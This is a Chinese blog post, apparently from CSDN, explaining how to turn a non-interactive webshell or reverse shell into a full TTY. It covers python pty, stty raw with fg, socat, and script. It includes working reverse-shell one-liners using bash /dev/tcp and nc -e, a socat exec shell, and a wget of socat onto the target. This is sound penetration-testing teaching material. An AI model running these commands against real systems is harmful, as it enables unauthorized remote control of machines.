python常用哪几种方式实现交互_实现交互式shell的几种方式

最新推荐文章于 2023-06-10 10:49:36 发布
最新推荐文章于 2023-06-10 10:49:36 发布
阅读量881 收藏
点赞数
文章标签: python常用哪几种方式实现交互

文章最后更新时间为:2019年06月12日 00:56:19

当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。

那我们怎么获取一个可交互的webshell呢?

1. python pty 方式

一般我们都会使用nc来接收反弹来的shell,只需要在目标上(以linux为例)执行:bash -i >& /dev/tcp/192.168.2.134/4444 0>&1

本地接收一下就ok了,但是反弹回来的shell,或多或少都会存在问题,比如当我想使用top命令时就会提示没有 tty。简单的来说就是没有上下文环境,这样的话,vim,sudo等操作都做不了,有时候还需要其他工具,很麻烦。C:\Users\w5023

λ nc -lvvp 4444

listening on [any] 4444 ...

connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30688

ubuntu@ubuntu:~$ whoami

whoami

ubuntu

ubuntu@ubuntu:~$ top

top

top: failed tty get

ubuntu@ubuntu:~$ tty

tty

not a tty

但是如果发现对方机器上有 python 的话,我们可以:python -c 'import pty; pty.spawn("/bin/bash")'

可以实现简单的tty,但是这种方式有个问题,当我们ctrl+C的时候,所有连接都会断掉,又需要重新来一遍,而且vim虽然可以用,也有点问题,同时没有记录,无法使用上方向键执行上条命令。

2. 升级nc为完全交互

整个流程是在第一步的基础上,但是需要用到的工具在linux上,所以把攻击机切换为linux。

现在攻击机和目标机分别为:攻击机 Linux 192.168.81.160

目标机 Linux 192.168.81.162

简单把反弹一个完全交互shell的过程写出来# 攻击机本地执行

# 首先检查当前终端和STTY信息

$ echo $TERM

$ stty -a

# nc开启监听

$ nc -lvvp 4444

# 目标机执行

$ bash -i >& /dev/tcp/192.168.81.160/4444 0>&1# 此时攻击机已经获取到了bash

# 接下来执行

$ python -c 'import pty; pty.spawn("/bin/bash")' //启用python交互式

# 把它丢到后台挂起

$ ctrl + z

# 重置stty,也就意味着你看不到输入的内容

$ stty raw -echo

# 把后台挂起的程序调回前台

$ fg

# 完全刷新终端屏幕

$ reset

# 接下来设置环境变量,根据第一步得到的环境变量来设置

$ export SHELL=bash

$ export TERM=xterm-256color

$ stty rows 行数 columns 列数

到这里,就可以得到一个完美的shell了。

3. 使用socat

socat是类Unix系统下的一个工具,可以看作是 nc 的加强版。我们可以使用socat来传递完整的带有tty的TCP连接。缺点也很明显,只能在linux下面运行

使用起来也很简单。攻击机:# 首先安装

$ sudo apt install socat

# 执行

$ socat file:`tty`,raw,echo=0 tcp-listen:4444

目标机# 把socat上传到目标机器上或者直接下载

$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

# 运行

$ chmod +x /tmp/socat

$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444

这种方式基本和ssh类似,ctrl+C也不会直接断开。

4. script获取pty

我们可以使用 Linux 系统下的 script 命令,在弹回来的 shell 下创建一个带有 tty 的 shell, 这样就可以勉强使用一下 top 和 vim :$ script /dev/null

如果不加 /dev/null 的话,会在当前路径下生成一个名字是 typescript 的文件,记录着在 script 生命周期里你执行的所有命令和结果。

结果:C:\Users\w5023

λ nc -lvvp 4444

listening on [any] 4444 ...

connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30567

ubuntu@ubuntu:~$ tty

tty

not a tty

ubuntu@ubuntu:~$ script /dev/null

script /dev/null

Script started, file is /dev/null

ubuntu@ubuntu:~$ tty

tty

/dev/pts/1

5. 参考

weixin_39758956
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pythonshell的3种交互方式介绍
12-25
下面我来逐步讲解一下shell交互方式。 hello.py代码如下: 复制代码 代码如下: #!/usr/bin/python print “hello, world!” TestInput.py代码如下: 复制代码 代码如下: #!/usr/bin/python str = raw_input()
使用Pythonnc对远程主机进行反向shell链接
chenjafo的博客
08-15 4128
nc这个命令屌炸天,经常用作黑客工具。简单说下反向shell 2台Linux电脑 A:192.168.0.21 B:192.168.0.22 A设置nc -lv 8081 B执行nc 192.168.0.21 8080 -e /bin/bash 这样就A就可以链接上B计算机的shell 但是-e这个参数默认时候是木有的,甚者nc命令都木有,可以自己下载源代码编译一个,略麻烦 但
python交互模式_python交互几种方式
weixin_39885690的博客
11-28 717
# 第一种交互方式name = input("name:")age = input("age:")job = input("job:")salary = input("salary")info = '''---------- info of '''+name+''' -----------Name:'''+name+'''Age:'''+age+'''Job:'''+job+'''Salary:'...
DevOps系列文章之 SSH 协议及 OpenSSH 实现
最新发布
Coder_Boy_的博客
06-10 1256
SSH(Secure Shell 的缩写)是一种,用于加密两台计算机之间的通信,并且支持各种身份验证机制1996年提出了 SSH 2 协议(或者称为 SSH 2.0),为现在各种实现采用的协议。
实现交互式shell几种方式python pty 方式、升级nc、socat、script获取pty
热门推荐
闵行小鱼塘
06-04 1万+
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。 那我们怎么获取一个可交互的webshell呢?
如何用python交互式界面?五分钟教会你。
weixin_52994140的博客
04-07 5862
链接:https://www.zhihu.com/question/60013978/answer/2222608439。商业转载请联系作者获得授权,非商业转载请注明出处。答疑源码分享可关注公众号:Python源码获取。界面中新增了上传头像的按钮。选择一张图片上传之后的效果。作者:python爱好者。界面中新增了注册界面。
linux怎样测试tty,linux – 提示自定义:如何检测何时没有tty
weixin_34966468的博客
05-12 291
我有一个带颜色的自定义提示符(使用tput),每次我在服务器中启动非交互式会话时,都会出现一堆错误.例如,如果我开始这样的非交互式会话:ssh root@hostname6 "echo 'hello' ; echo $TERM"我得到的输出是:helloxtermtput: No value for $TERM and no -T specifiedtput: No value for $TERM...
报错解决:the input device is not a TTY
ss810540895的博客
10-10 530
容器并执行某一操作时,可能会出现如题所示错误,原因是后台linux执行的时候没有终端设备,TTY一词源于Teletypes,或teletypewriters。其实出现该错误和我们的一个习惯有关,一般来说我们启动容器后要与容器进行交互操作,这是,就要加上"-it"这个参数,而在重启过重中或定时任务中,如果让脚本在后台运行,就没有可交互的终端,这就会引发如题所示错误,在重启过程中用shell脚本去启动。
python常用哪几种方式实现交互_利用python进行数据分析---第三章 Ipython--一种交互式计算和开发环境...
weixin_39959298的博客
12-10 404
我现在是一名硕士生在读,python小白一个,因为近期有分析数据的需求,所以就找了一本python数据分析的书来啃,在这里分享记录自己的学习历程,不是完全的照本宣科,仅仅记录自己认为常用的实用的部分章节,以此监督,以此共同进步,每天进步一点点。第一章 准备工作本书主要内容本书讲的是利用python进行数据控制、处理、整理、分析等方面的具体细节和基本要点。同时它也是利用python进行科学计算的实用...
python常用哪几种方式实现交互,Pythonshell的3种交互方式介绍
weixin_28849929的博客
03-26 490
概述考虑这样一个问题,有hello.py脚本,输出”hello, world!”;有TestInput.py脚本,等待用户输入,然后打印用户输入的数据。那么,怎么样把hello.py输出内容发送给TestInput.py,最后TestInput.py打印接收到的”hello, world!”。下面我来逐步讲解一下shell交互方式。hello.py代码如下:复制代码 代码如下:#!/usr/bi...
python3交互模式_在Python3中使用paramiko模块实现交互式操作(简洁实战+总结)
weixin_39624367的博客
12-08 527
我想实现的是:使用服务器A登录服务器B,把服务器B的文件用SCP发到服务器C中,因为有yes/no的输入,不知道用paramiko模块实现?我在服务器B中写了一个.sh用于测试:study_shell.sh#! /bin/bashecho "hello, shell! 0130"choice="null"echo "${choice}"read -p "Do you want to bui...
Python3交互式shell ipython3安装及使用详解
09-16
主要介绍了Python3交互式shell ipython3安装及使用详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
python获取交互式ssh shell的方法
09-19
今天小编就为大家分享一篇python获取交互式ssh shell的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
管理:适用于Python项目的命令行管理器+交互式Shell
02-05
管理:适用于Python项目的命令行管理器+交互式Shell
OPENSSH服务
heibaikong6的博客
05-14 1275
文章目录0.什么是OpenSSH Secure Shell(SSH)1.远程连接服务器1.1什么是远程连接服务器1.2远程连接服务器的功能1.3常见的远程管理工具方式2. SSH3. TELNET4. 如何实现加密4.1 SSH算法4.2 SSL4.3加密技术4.3.1非对称加密4.3.2CA4.3.3密钥技术证书作用4.3.4PFX5. ssh两种验证级别6. 解读SSH服务配置信息7.ssh特...
用OpenSSH 配置 SFTP 服务器 (OpenSSH for Windows)
ericwuhk的专栏
09-07 1万+
OpenSSH for Windows https://winscp.net/eng/docs/guide_windows_openssh_serverhttps://github.com/PowerShell/Win32-OpenSSH/releases
OpenSSH概念和基本用法——SSH 客户端
肥叔菌的博客
01-04 8929
由于在分布式数据库运维过程中进行脚本自动化必然会涉及SSH登录工具,故摘抄此篇文章以供学习之用。 SSH 是 Linux 系统的登录工具,现在广泛用于服务器登录和各种加密通信。本教程介绍 SSH(主要是它的实现 OpenSSH)的概念和基本用法,也可以当作手册查询。SSH(Secure Shell 的缩写)是一种网络协议,用于加密两台计算机之间的通信,并且支持各种身份验证机制。它主要用于保证远程登录和远程通信的安全,任何网络服务都可以用这个协议来加密。 SSH 是什么 历史上,网络主机之间的通信是不加密的,
Python实现用户交互,显示省市县三级联动的选择
weixin_30741653的博客
12-05 807
题目:Python实现用户交互,显示省市县三级联动的选择 定义的字典为:   dic = {          "江西": {    "萍乡": ["安源", "彭高", "上栗"],    "新余": ["良山", "新钢", "兴安岭"],    },         "北京": {    "大兴区": ["礼贤镇", "魏善庄镇", "北臧村镇"],    "昌...
python基础(五):与用户交互、格式化输出
一点一滴铺就人生
04-26 1004
一、与用户交互 交互的本质就是输入、输出 1、输入 # 在python3中input功能会等待用户的输入,用户输入任何内容,都存成字符串类型,然后赋值给等号左边的变量名 >>> username=input('请输入您的用户名:') 请输入您的用户名:jack # username = "jack" >>> password=input('请输入您的密码:')...
Python书写交互方式
05-26
Python几种书写交互方式: 1. Python Shell:运行 Python 解释器,可以在命令行中直接输入 Python 代码,并立即看到它的输出。在大多数情况下,Python Shell 用于快速测试代码片段。 2. IPython:IPython 是一个增强版的 Python Shell,它提供了更多的功能,如代码自动完成、历史记录、语法高亮等。 3. Jupyter Notebook:Jupyter Notebook 是一个用于数据分析和可视化的交互式笔记本,它可以在浏览器中运行。在 Jupyter Notebook 中,你可以将代码、文本和图形组合在一起,并与其他人共享你的工作。 4. IDE:集成开发环境(IDE)是一种软件,它提供了一个完整的开发环境,包括代码编辑器、调试器、版本控制等。 Python 有许多常用的 IDE,如 PyCharm、Visual Studio Code、Spyder 等。 无论你选择哪种方式Python 都是一种易于学习和使用的编程语言,它适用于各种类型的项目,从简单的脚本到复杂的数据分析和机器学习应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值